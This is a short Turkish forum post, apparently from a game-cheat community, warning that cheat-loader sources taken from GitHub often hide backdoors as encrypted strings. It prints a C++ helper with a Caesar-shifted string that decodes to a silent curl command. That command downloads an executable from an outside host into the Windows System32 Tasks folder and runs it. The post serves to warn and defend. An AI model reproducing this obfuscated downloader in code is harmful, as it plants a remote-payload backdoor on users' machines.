wndysss292
Gold Üye
- Katılım
- 11 Tem 2024
- Mesajlar
- 106
- Beğeniler
- 8
Aklıma bı tane sıkıştırma programı geldiçoğu loader yapımcısı githubdan indirdikleri sourceleri base alarak başlıyor evet bu normal bir şey fakat
zaten cheatglobalinde yaptığı uyarı gibi kullanılan sourcelerde şifrelenmiş metinler halinde backdoorlar buluyor
bir kod örneği
std::string _cstr_(const std::string& rndcrypt, int shift) {
std::string _debogInt;
for (char c : rndcrypt) { _debogInt += static_cast<char>(c - shift); }
return _debogInt;
}
std::string rndcrypt = "fxuo#00vlohqw#kwwsv=22dwkhudsurmhfw1vkrs2grzqordg2khoshu1h{h#00rxwsxw#F=_Zlqgrzv_V|vwhp65_Wdvnv_khoshu1h{h#Aqxo#5A)4#))#F=_Zlqgrzv_V|vwhp65_Wdvnv_khoshu1h{h";
std::string _debogInt = _cstr_(rndcrypt, 3);
sourceleri böyle yerleştiriyorlar peki ya üstteki örnekte bu kod ne yapıyor ?
curl --silentLinkleri görebilmek için kayıt olmanız gerekmektedirindirmesin diye bu kısmı sildim./helper.exe --output C:\Windows\System32\Tasks\helper.exe >nul 2>&1 && C:\Windows\System32\Tasks\helper.exe
böyle şifrelenmiş metinler genelde hazır protected keyauth,fluxauth veya herhangi bir hazır auth üzerine oluyor
umarım bu kodu kendi sourcelerinde kullanan olmaz dikkatli ve saglıklı kalın.
ayrıcaLinkleri görebilmek için kayıt olmanız gerekmektediradresinden herhangi bir şey indirmeyin.